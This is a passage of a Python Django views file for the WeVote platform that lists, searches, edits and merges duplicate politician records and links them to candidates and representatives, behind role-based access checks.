new_filter = (\n Q(politician_email__icontains=one_word) |\n Q(politician_email2__icontains=one_word) |\n Q(politician_email3__icontains=one_word)\n )\n 
filters.append(new_filter)\n\n new_filter = Q(politician_name__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = (\n Q(politician_twitter_handle__icontains=one_word) |\n Q(politician_twitter_handle2__icontains=one_word) |\n Q(politician_twitter_handle3__icontains=one_word) |\n Q(politician_twitter_handle4__icontains=one_word) |\n Q(politician_twitter_handle5__icontains=one_word)\n )\n filters.append(new_filter)\n\n new_filter = Q(political_party__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = Q(seo_friendly_path__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = Q(vote_usa_politician_id__icontains=one_word)\n filters.append(new_filter)\n\n new_filter = Q(we_vote_id__iexact=one_word)\n filters.append(new_filter)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n politician_query = politician_query.filter(final_filters)\n\n politician_list_count = politician_query.count()\n if not positive_value_exists(show_all):\n politician_list = politician_query.order_by('politician_name')[:25]\n else:\n # We still want to limit to 200\n politician_list = politician_query.order_by('politician_name')[:200]\n except ObjectDoesNotExist:\n # This is fine\n pass\n\n # Attach candidates linked to these politicians\n temp_politician_list = []\n for one_politician in politician_list:\n try:\n linked_candidate_query = CandidateCampaign.objects.using('readonly').all()\n linked_candidate_query = linked_candidate_query.filter(\n Q(politician_we_vote_id__iexact=one_politician.we_vote_id) |\n Q(politician_id=one_politician.id))\n linked_candidate_list_count = linked_candidate_query.count()\n one_politician.linked_candidate_list_count = linked_candidate_list_count\n temp_politician_list.append(one_politician)\n except Exception as e:\n pass\n\n politician_list = temp_politician_list\n\n # Cycle through all Politicians and find unlinked Candidates that *might* be \"children\" of this politician\n if show_related_candidates:\n temp_politician_list = []\n for one_politician in politician_list:\n try:\n related_candidate_list = CandidateCampaign.objects.using('readonly').all()\n related_candidate_list = related_candidate_list.exclude(politician_we_vote_id=one_politician.we_vote_id)\n\n filters = []\n new_filter = Q(candidate_name__icontains=one_politician.first_name) & \\\n Q(candidate_name__icontains=one_politician.last_name)\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle2):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle2) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle2) |\n Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle2)\n )\n filters.append(new_filter)\n\n if positive_value_exists(one_politician.politician_twitter_handle3):\n new_filter = (\n Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle3) |\n Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle3) |\n 
Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle3)\n                    )\n                    filters.append(new_filter)\n\n                if positive_value_exists(one_politician.politician_twitter_handle4):\n                    new_filter = (\n                        Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle4) |\n                        Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle4) |\n                        Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle4)\n                    )\n                    filters.append(new_filter)\n\n                if positive_value_exists(one_politician.politician_twitter_handle5):\n                    new_filter = (\n                        Q(candidate_twitter_handle__iexact=one_politician.politician_twitter_handle5) |\n                        Q(candidate_twitter_handle2__iexact=one_politician.politician_twitter_handle5) |\n                        Q(candidate_twitter_handle3__iexact=one_politician.politician_twitter_handle5)\n                    )\n                    filters.append(new_filter)\n\n                if positive_value_exists(one_politician.vote_smart_id):\n                    new_filter = Q(vote_smart_id=one_politician.vote_smart_id)\n                    filters.append(new_filter)\n\n                # Add the first query\n                if len(filters):\n                    final_filters = filters.pop()\n\n                    # ...and \"OR\" the remaining items in the list\n                    for item in filters:\n                        final_filters |= item\n\n                    related_candidate_list = related_candidate_list.filter(final_filters)\n\n                related_candidate_list_count = related_candidate_list.count()\n            except Exception as e:\n                related_candidate_list_count = 0\n\n            one_politician.related_candidate_list_count = related_candidate_list_count\n            temp_politician_list.append(one_politician)\n\n        politician_list = temp_politician_list\n\n    # Now find all representative ids related to this politician\n    temp_politician_list = []\n    for one_politician in politician_list:\n        if one_politician.we_vote_id:\n            try:\n                queryset = Representative.objects.all()\n                queryset = queryset.filter(politician_we_vote_id__iexact=one_politician.we_vote_id)\n                linked_representative_we_vote_id_list = []\n                linked_representative_list = list(queryset)\n                for representative in linked_representative_list:\n                    linked_representative_we_vote_id_list.append(representative.we_vote_id)\n                one_politician.linked_representative_we_vote_id_list = linked_representative_we_vote_id_list\n            except Exception as e:\n                one_politician.linked_representative_we_vote_id_list = []  # fall back to an empty list on error\n\n            temp_politician_list.append(one_politician)\n\n    politician_list = temp_politician_list\n\n    election_list = Election.objects.order_by('-election_day_text')\n\n    messages.add_message(request, messages.INFO,\n                         \"Politician Count: {politician_list_count:,}\"\n                         \"\".format(politician_list_count=politician_list_count))\n\n    if 'localhost' in WEB_APP_ROOT_URL:\n        web_app_root_url = 'https://localhost:3000'\n    else:\n        web_app_root_url = 'https://quality.WeVote.US'\n    template_values = {\n        'messages_on_stage': messages_on_stage,\n        'google_civic_election_id': google_civic_election_id,\n        'politician_list': politician_list,\n        'politician_search': politician_search,\n        'election_list': election_list,\n        'show_all': show_all,\n        'show_battleground': show_battleground,\n        'show_politicians_with_email': show_politicians_with_email,\n        'show_related_candidates': show_related_candidates,\n        'show_ocd_id_state_mismatch': show_ocd_id_state_mismatch,\n        'state_code': state_code,\n        'state_list': sorted_state_list,\n        'web_app_root_url': web_app_root_url,\n    }\n    return render(request, 'politician/politician_list.html', template_values)\n\n\n@login_required\ndef politician_merge_process_view(request):\n    \"\"\"\n    Process the merging of two politicians\n    :param request:\n    :return:\n    \"\"\"\n    # admin, analytics_admin, partner_organization, 
political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n status = ''\n politician_manager = PoliticianManager()\n\n merge = request.POST.get('merge', False)\n skip = request.POST.get('skip', False)\n\n # Politician 1 is the one we keep, and Politician 2 is the one we will merge into Politician 1\n politician1_we_vote_id = request.POST.get('politician1_we_vote_id', 0)\n politician2_we_vote_id = request.POST.get('politician2_we_vote_id', 0)\n google_civic_election_id = request.POST.get('google_civic_election_id', 0)\n redirect_to_politician_list = request.POST.get('redirect_to_politician_list', False)\n remove_duplicate_process = request.POST.get('remove_duplicate_process', False)\n state_code = request.POST.get('state_code', '')\n\n if positive_value_exists(skip):\n results = politician_manager.update_or_create_politicians_are_not_duplicates(\n politician1_we_vote_id, politician2_we_vote_id)\n if results['success']:\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n politician1_we_vote_id__iexact=politician1_we_vote_id,\n politician2_we_vote_id__iexact=politician2_we_vote_id,\n )\n queryset.delete()\n if not results['new_politicians_are_not_duplicates_created']:\n messages.add_message(request, messages.ERROR, 'Could not save politicians_are_not_duplicates entry: ' +\n results['status'])\n messages.add_message(request, messages.INFO, 'Prior politicians skipped, and not merged.')\n return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n politician1_results = politician_manager.retrieve_politician(\n politician_we_vote_id=politician1_we_vote_id,\n read_only=True)\n if politician1_results['politician_found']:\n politician1_on_stage = politician1_results['politician']\n else:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician 1.')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n '?google_civic_election_id=' + str(google_civic_election_id) +\n '&state_code=' + str(state_code))\n\n politician2_results = politician_manager.retrieve_politician_from_we_vote_id(politician2_we_vote_id)\n if politician2_results['politician_found']:\n politician2_on_stage = politician2_results['politician']\n else:\n messages.add_message(request, messages.ERROR, 'Could not retrieve politician 2.')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n '?google_civic_election_id=' + str(google_civic_election_id) +\n '&state_code=' + str(state_code))\n\n # Gather choices made from merge form\n conflict_results = figure_out_politician_conflict_values(politician1_on_stage, politician2_on_stage)\n politician_merge_conflict_values = conflict_results['politician_merge_conflict_values']\n if not conflict_results['success']:\n status += conflict_results['status']\n messages.add_message(request, messages.ERROR, status)\n admin_merge_choices = {}\n clear_these_attributes_from_politician2 = []\n for attribute in POLITICIAN_UNIQUE_IDENTIFIERS:\n conflict_value = politician_merge_conflict_values.get(attribute, None)\n if conflict_value == \"CONFLICT\":\n choice = request.POST.get(attribute + '_choice', '')\n if politician2_we_vote_id == choice:\n admin_merge_choices[attribute] = getattr(politician2_on_stage, 
attribute)\n if attribute in POLITICIAN_UNIQUE_ATTRIBUTES_TO_BE_CLEARED:\n clear_these_attributes_from_politician2.append(attribute)\n elif conflict_value == \"POLITICIAN2\":\n admin_merge_choices[attribute] = getattr(politician2_on_stage, attribute)\n if attribute in POLITICIAN_UNIQUE_ATTRIBUTES_TO_BE_CLEARED:\n clear_these_attributes_from_politician2.append(attribute)\n\n merge_results = merge_these_two_politicians(\n politician1_we_vote_id,\n politician2_we_vote_id,\n admin_merge_choices,\n clear_these_attributes_from_politician2)\n\n if positive_value_exists(merge_results['politicians_merged']):\n politician = merge_results['politician']\n messages.add_message(request, messages.INFO, \"Politician '{politician_name}' merged.\"\n \"\".format(politician_name=politician.politician_name))\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n politician1_we_vote_id__iexact=politician1_we_vote_id,\n politician2_we_vote_id__iexact=politician2_we_vote_id,\n )\n queryset.delete()\n else:\n # NOTE: We could also redirect to a page to look specifically at these two politicians, but this should\n # also get you back to looking at the two politicians\n messages.add_message(request, messages.ERROR, merge_results['status'])\n return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&auto_merge_off=1\" +\n \"&state_code=\" + str(state_code))\n\n if redirect_to_politician_list:\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n '?google_civic_election_id=' + str(google_civic_election_id) +\n '&state_code=' + str(state_code))\n\n if remove_duplicate_process:\n return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician1_on_stage.id,)))\n\n\n@login_required\ndef politician_new_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n google_civic_election_id = request.GET.get('google_civic_election_id', 0)\n contest_office_id = request.GET.get('contest_office_id', 0)\n\n # These variables are here because there was an error on the edit_process_view and the voter needs to try again\n politician_name = request.GET.get('politician_name', \"\")\n google_civic_candidate_name = request.GET.get('google_civic_candidate_name', \"\")\n google_civic_candidate_name2 = request.GET.get('google_civic_candidate_name2', \"\")\n google_civic_candidate_name3 = request.GET.get('google_civic_candidate_name3', \"\")\n state_code = request.GET.get('state_code', \"\")\n politician_twitter_handle = request.GET.get('politician_twitter_handle', \"\")\n politician_twitter_handle2 = request.GET.get('politician_twitter_handle2', \"\")\n politician_twitter_handle3 = request.GET.get('politician_twitter_handle3', \"\")\n politician_twitter_handle4 = request.GET.get('politician_twitter_handle4', \"\")\n politician_twitter_handle5 = request.GET.get('politician_twitter_handle5', \"\")\n politician_url = request.GET.get('politician_url', \"\")\n politician_url2 = request.GET.get('politician_url2', \"\")\n politician_url3 = 
request.GET.get('politician_url3', \"\")\n politician_url4 = request.GET.get('politician_url4', \"\")\n politician_url5 = request.GET.get('politician_url5', \"\")\n political_party = request.GET.get('political_party', \"\")\n ballot_guide_official_statement = request.GET.get('ballot_guide_official_statement', \"\")\n vote_smart_id = request.GET.get('vote_smart_id', \"\")\n maplight_id = request.GET.get('maplight_id', \"\")\n politician_we_vote_id = request.GET.get('politician_we_vote_id', \"\")\n gender = request.GET.get('gender', \"U\")\n gender_likelihood = request.GET.get('gender_likelihood', \"\")\n\n # These are the Offices already entered for this election\n try:\n contest_office_list = ContestOffice.objects.order_by('office_name')\n contest_office_list = contest_office_list.filter(google_civic_election_id=google_civic_election_id)\n except Exception as e:\n handle_record_not_found_exception(e, logger=logger)\n contest_office_list = []\n\n # It's helpful to see existing politicians when entering a new politician\n politician_list = []\n try:\n politician_list = Politician.objects.all()\n if positive_value_exists(google_civic_election_id):\n politician_list = politician_list.filter(google_civic_election_id=google_civic_election_id)\n if positive_value_exists(contest_office_id):\n politician_list = politician_list.filter(contest_office_id=contest_office_id)\n politician_list = politician_list.order_by('politician_name')[:500]\n except Politician.DoesNotExist:\n # This is fine, create new\n pass\n\n messages_on_stage = get_messages(request)\n template_values = {\n 'messages_on_stage': messages_on_stage,\n 'office_list': contest_office_list,\n 'contest_office_id': contest_office_id, # Pass in separately for the template to work\n 'gender': gender,\n 'gender_likelihood': gender_likelihood,\n 'google_civic_election_id': google_civic_election_id,\n 'politician_list': politician_list,\n # Incoming variables, not saved yet\n 'politician_name': politician_name,\n 'google_civic_candidate_name': google_civic_candidate_name,\n 'google_civic_candidate_name2': google_civic_candidate_name2,\n 'google_civic_candidate_name3': google_civic_candidate_name3,\n 'state_code': state_code,\n 'politician_twitter_handle': politician_twitter_handle,\n 'politician_twitter_handle2': politician_twitter_handle2,\n 'politician_twitter_handle3': politician_twitter_handle3,\n 'politician_twitter_handle4': politician_twitter_handle4,\n 'politician_twitter_handle5': politician_twitter_handle5,\n 'politician_url': politician_url,\n 'politician_url2': politician_url2,\n 'politician_url3': politician_url3,\n 'politician_url4': politician_url4,\n 'politician_url5': politician_url5,\n 'political_party': political_party,\n 'ballot_guide_official_statement': ballot_guide_official_statement,\n 'vote_smart_id': vote_smart_id,\n 'maplight_id': maplight_id,\n 'politician_we_vote_id': politician_we_vote_id,\n }\n return render(request, 'politician/politician_edit.html', template_values)\n\n\n@login_required\ndef politician_delete_all_duplicates_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n state_code = request.GET.get('state_code', '')\n if positive_value_exists(state_code):\n queryset = PoliticiansArePossibleDuplicates.objects.filter(\n state_code__iexact=state_code,\n )\n 
queryset.delete()\n messages.add_message(request, messages.INFO, 'Duplicate politician data deleted.')\n else:\n messages.add_message(request, messages.INFO, 'Duplicate politician data NOT deleted. State code missing.')\n return HttpResponseRedirect(reverse('politician:duplicates_list', args=()) +\n \"?state_code=\" + str(state_code))\n\n\n@login_required\ndef politician_duplicates_list_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'partner_organization', 'political_data_viewer', 'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n messages_on_stage = get_messages(request)\n state_code = request.GET.get('state_code', '')\n politician_search = request.GET.get('politician_search', '')\n google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))\n show_all = positive_value_exists(request.GET.get('show_all', False))\n show_related_candidates = positive_value_exists(request.GET.get('show_related_candidates', False))\n show_politicians_with_email = request.GET.get('show_politicians_with_email', False)\n\n duplicates_list = []\n duplicates_list_count = 0\n possible_duplicates_count = 0\n state_list = STATE_CODE_MAP\n sorted_state_list = sorted(state_list.items())\n\n try:\n queryset = PoliticiansArePossibleDuplicates.objects.using('readonly').all()\n if positive_value_exists(state_code):\n queryset = queryset.filter(state_code__iexact=state_code)\n duplicates_list_count = queryset.count()\n queryset = queryset.exclude(\n Q(politician2_we_vote_id__isnull=True) | Q(politician2_we_vote_id=''))\n possible_duplicates_count = queryset.count()\n if not positive_value_exists(show_all):\n duplicates_list = list(queryset[:200])\n else:\n duplicates_list = list(queryset[:1000])\n except ObjectDoesNotExist:\n # This is fine\n pass\n\n # Attach candidates linked to these politicians\n politicians_to_display_we_vote_id_list = []\n for one_duplicate in duplicates_list:\n if positive_value_exists(one_duplicate.politician1_we_vote_id):\n politicians_to_display_we_vote_id_list.append(one_duplicate.politician1_we_vote_id)\n if positive_value_exists(one_duplicate.politician2_we_vote_id):\n politicians_to_display_we_vote_id_list.append(one_duplicate.politician2_we_vote_id)\n\n politicians_dict = {}\n try:\n queryset = Politician.objects.using('readonly').all()\n queryset = queryset.filter(we_vote_id__in=politicians_to_display_we_vote_id_list)\n politician_data_list = list(queryset)\n for one_politician in politician_data_list:\n politicians_dict[one_politician.we_vote_id] = one_politician\n except Exception as e:\n pass\n\n duplicates_list_modified = []\n for one_duplicate in duplicates_list:\n if positive_value_exists(one_duplicate.politician1_we_vote_id) \\\n and one_duplicate.politician1_we_vote_id in politicians_dict \\\n and positive_value_exists(one_duplicate.politician2_we_vote_id) \\\n and one_duplicate.politician2_we_vote_id in politicians_dict:\n one_duplicate.politician1 = politicians_dict[one_duplicate.politician1_we_vote_id]\n one_duplicate.politician2 = politicians_dict[one_duplicate.politician2_we_vote_id]\n duplicates_list_modified.append(one_duplicate)\n else:\n possible_duplicates_count -= 1\n\n messages.add_message(request, messages.INFO,\n \"Politicians analyzed: {duplicates_list_count:,}. \"\n \"Possible duplicate politicians found: {possible_duplicates_count:,}. 
\"\n \"State: {state_code}\"\n \"\".format(\n duplicates_list_count=duplicates_list_count,\n possible_duplicates_count=possible_duplicates_count,\n state_code=state_code))\n\n template_values = {\n 'messages_on_stage': messages_on_stage,\n 'google_civic_election_id': google_civic_election_id,\n 'duplicates_list': duplicates_list_modified,\n 'politician_search': politician_search,\n 'show_all': show_all,\n 'show_politicians_with_email': show_politicians_with_email,\n 'show_related_candidates': show_related_candidates,\n 'state_code': state_code,\n 'state_list': sorted_state_list,\n }\n return render(request, 'politician/politician_duplicates_list.html', template_values)\n\n\n@login_required\ndef politician_edit_by_we_vote_id_view(request, politician_we_vote_id):\n politician_manager = PoliticianManager()\n politician_id = politician_manager.fetch_politician_id_from_we_vote_id(politician_we_vote_id)\n return politician_we_vote_id(request, politician_id)\n\n\n@login_required\ndef politician_edit_view(request, politician_id=0, politician_we_vote_id=''):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n # These variables are here because there was an error on the edit_process_view and the voter needs to try again\n ballotpedia_politician_url = request.GET.get('ballotpedia_politician_url', False)\n facebook_url = request.GET.get('facebook_url', False)\n facebook_url2 = request.GET.get('facebook_url2', False)\n facebook_url3 = request.GET.get('facebook_url3', False)\n google_civic_candidate_name = request.GET.get('google_civic_candidate_name', False)\n google_civic_candidate_name2 = request.GET.get('google_civic_candidate_name2', False)\n google_civic_candidate_name3 = request.GET.get('google_civic_candidate_name3', False)\n instagram_handle = request.GET.get('instagram_handle', False)\n if positive_value_exists(instagram_handle):\n instagram_handle = extract_instagram_handle_from_text_string(instagram_handle)\n politician_contact_form_url = request.GET.get('politician_contact_form_url', False)\n politician_email = request.GET.get('politician_email', False)\n politician_email2 = request.GET.get('politician_email2', False)\n politician_email3 = request.GET.get('politician_email3', False)\n politician_name = request.GET.get('politician_name', False)\n politician_phone_number = request.GET.get('politician_phone_number', False)\n politician_phone_number2 = request.GET.get('politician_phone_number2', False)\n politician_phone_number3 = request.GET.get('politician_phone_number3', False)\n politician_twitter_handle = request.GET.get('politician_twitter_handle', False)\n politician_twitter_handle2 = request.GET.get('politician_twitter_handle2', False)\n politician_twitter_handle3 = request.GET.get('politician_twitter_handle3', False)\n politician_twitter_handle4 = request.GET.get('politician_twitter_handle4', False)\n politician_twitter_handle5 = request.GET.get('politician_twitter_handle5', False)\n politician_url = request.GET.get('politician_url', False)\n politician_url2 = request.GET.get('politician_url2', False)\n politician_url3 = request.GET.get('politician_url3', False)\n politician_url4 = request.GET.get('politician_url4', False)\n politician_url5 = request.GET.get('politician_url5', False)\n political_party = request.GET.get('political_party', False)\n 
state_code = request.GET.get('state_code', False)\n status = ''\n vote_smart_id = request.GET.get('vote_smart_id', False)\n maplight_id = request.GET.get('maplight_id', False)\n\n messages_on_stage = get_messages(request)\n politician_id = convert_to_int(politician_id)\n politician_on_stage_found = False\n politician_on_stage = Politician()\n\n try:\n if positive_value_exists(politician_id):\n politician_on_stage = Politician.objects.get(id=politician_id)\n politician_we_vote_id = politician_on_stage.we_vote_id\n else:\n politician_on_stage = Politician.objects.get(we_vote_id=politician_we_vote_id)\n politician_id = politician_on_stage.id\n politician_on_stage_found = True\n except Politician.MultipleObjectsReturned as e:\n handle_record_found_more_than_one_exception(e, logger=logger)\n except Politician.DoesNotExist:\n # This is fine, create new below\n pass\n\n if politician_on_stage_found:\n # Generate a CampaignX entry for this politician if one does not exist\n if not positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n results = generate_campaignx_for_politician(\n politician=politician_on_stage,\n save_individual_politician=True,\n )\n politician_on_stage = results['politician']\n\n # Working with Vote Smart data\n rating_list = []\n vote_smart_turned_on = False\n if vote_smart_turned_on:\n try:\n vote_smart_politician_id = politician_on_stage.vote_smart_id\n rating_list_query = VoteSmartRatingOneCandidate.objects.order_by('-timeSpan') # Desc order\n rating_list = rating_list_query.filter(candidateId=vote_smart_politician_id)\n except VotesmartApiError as error_instance:\n # Catch the error message coming back from Vote Smart and pass it in the status\n error_message = error_instance.args\n status = \"EXCEPTION_RAISED: {error_message}\".format(error_message=error_message)\n print_to_log(logger=logger, exception_message_optional=status)\n rating_list = []\n\n # ##################################\n # Show the seo friendly paths for this politician\n path_count = 0\n path_list = []\n if positive_value_exists(politician_we_vote_id):\n from politician.models import PoliticianSEOFriendlyPath\n try:\n path_query = PoliticianSEOFriendlyPath.objects.all()\n path_query = path_query.filter(politician_we_vote_id__iexact=politician_we_vote_id)\n path_count = path_query.count()\n path_list = list(path_query[:4])\n except Exception as e:\n status += 'ERROR_RETRIEVING_FROM_PoliticianSEOFriendlyPath: ' + str(e) + ' '\n\n if positive_value_exists(politician_on_stage.seo_friendly_path):\n path_list_modified = []\n for one_path in path_list:\n if politician_on_stage.seo_friendly_path != one_path.final_pathname_string:\n path_list_modified.append(one_path)\n path_list = path_list_modified\n path_list = path_list[:3]\n\n # Working with We Vote Positions\n try:\n politician_position_query = PositionEntered.objects.order_by('stance')\n # As of Aug 2018 we are no longer using PERCENT_RATING\n politician_position_query = politician_position_query.exclude(stance__iexact='PERCENT_RATING')\n politician_position_list = politician_position_query.filter(\n politician_we_vote_id__iexact=politician_on_stage.we_vote_id)\n except Exception as e:\n politician_position_list = []\n\n # Working with Candidate \"children\" of this politician\n try:\n linked_candidate_list = CandidateCampaign.objects.all()\n linked_candidate_list = linked_candidate_list.filter(\n Q(politician_we_vote_id__iexact=politician_on_stage.we_vote_id) |\n Q(politician_id=politician_on_stage.id))\n except Exception as e:\n 
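# NOTE (illustrative sketch): the try/except above resolves a politician from
# either the numeric id or the we_vote_id string. Reduced to its essentials
# (helper name is hypothetical; MultipleObjectsReturned handling omitted;
# Politician and positive_value_exists come from this module's imports):
def retrieve_politician_flexible(politician_id=0, politician_we_vote_id=''):
    try:
        if positive_value_exists(politician_id):
            return Politician.objects.get(id=politician_id)
        return Politician.objects.get(we_vote_id=politician_we_vote_id)
    except Politician.DoesNotExist:
        return None  # caller may create a new Politician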
linked_candidate_list = []\n\n # ##################################\n # Find Candidates to Link to this Politician\n # Finding Candidates that *might* be \"children\" of this politician\n from politician.controllers import find_candidates_to_link_to_this_politician\n related_candidate_list = find_candidates_to_link_to_this_politician(politician=politician_on_stage)\n\n # Find possible duplicate politicians\n duplicate_politician_list = []\n if positive_value_exists(politician_on_stage.politician_name) or \\\n positive_value_exists(politician_on_stage.first_name) or \\\n positive_value_exists(politician_on_stage.last_name) or \\\n positive_value_exists(politician_on_stage.politician_twitter_handle) or \\\n positive_value_exists(politician_on_stage.vote_smart_id):\n try:\n duplicate_politician_list = Politician.objects.all()\n duplicate_politician_list = duplicate_politician_list.exclude(\n we_vote_id__iexact=politician_on_stage.we_vote_id)\n\n filters = []\n if positive_value_exists(politician_on_stage.politician_name):\n new_filter = Q(politician_name__icontains=politician_on_stage.politician_name)\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.first_name) or \\\n positive_value_exists(politician_on_stage.last_name):\n new_filter = Q(first_name__icontains=politician_on_stage.first_name) & \\\n Q(last_name__icontains=politician_on_stage.last_name)\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle2):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle2) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle2)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle3):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle3) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle3)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle4):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle4) |\n 
Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle4) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle4)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.politician_twitter_handle5):\n new_filter = (\n Q(politician_twitter_handle__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle2__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle3__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle4__icontains=politician_on_stage.politician_twitter_handle5) |\n Q(politician_twitter_handle5__icontains=politician_on_stage.politician_twitter_handle5)\n )\n filters.append(new_filter)\n\n if positive_value_exists(politician_on_stage.vote_smart_id):\n new_filter = Q(vote_smart_id=politician_on_stage.vote_smart_id)\n filters.append(new_filter)\n\n politician_on_stage.politician_name_normalized = ''\n if positive_value_exists(politician_on_stage.politician_name):\n raw = politician_on_stage.politician_name\n cnt = sum(1 for c in raw if c.isupper())\n if cnt > 5:\n humanized = display_full_name_with_correct_capitalization(raw)\n humanized_cleaned = humanized.replace('(', '').replace(')', '')\n politician_on_stage.politician_name_normalized = string.capwords(humanized_cleaned)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n duplicate_politician_list = duplicate_politician_list.filter(final_filters)\n\n duplicate_politician_list = duplicate_politician_list.order_by('politician_name')[:20]\n except ObjectDoesNotExist:\n # This is fine, create new\n pass\n\n linked_representative_list = []\n if positive_value_exists(politician_we_vote_id):\n queryset = Representative.objects.using('readonly').all()\n queryset = queryset.filter(politician_we_vote_id__iexact=politician_we_vote_id)\n linked_representative_list = list(queryset)\n\n # ##################################\n # Find Representatives to Link to this Politician\n # Finding Representatives that *might* be \"children\" of this politician\n from politician.controllers import find_representatives_to_link_to_this_politician\n related_representative_list = find_representatives_to_link_to_this_politician(politician=politician_on_stage)\n\n if 'localhost' in WEB_APP_ROOT_URL:\n web_app_root_url = 'https://localhost:3000'\n else:\n web_app_root_url = 'https://quality.WeVote.US'\n template_values = {\n 'ballotpedia_politician_url': ballotpedia_politician_url,\n 'duplicate_politician_list': duplicate_politician_list,\n 'facebook_url': facebook_url,\n 'facebook_url2': facebook_url2,\n 'facebook_url3': facebook_url3,\n 'google_civic_candidate_name': google_civic_candidate_name,\n 'google_civic_candidate_name2': google_civic_candidate_name2,\n 'google_civic_candidate_name3': google_civic_candidate_name3,\n 'instagram_handle': instagram_handle,\n 'linked_candidate_list': linked_candidate_list,\n 'linked_representative_list': linked_representative_list,\n 'maplight_id': maplight_id,\n 'messages_on_stage': messages_on_stage,\n 'path_count': path_count,\n 'path_list': path_list,\n 'politician': politician_on_stage,\n 'politician_email': politician_email,\n 'politician_email2': politician_email2,\n 'politician_email3': politician_email3,\n 'politician_name': politician_name,\n 'politician_phone_number': politician_phone_number,\n 
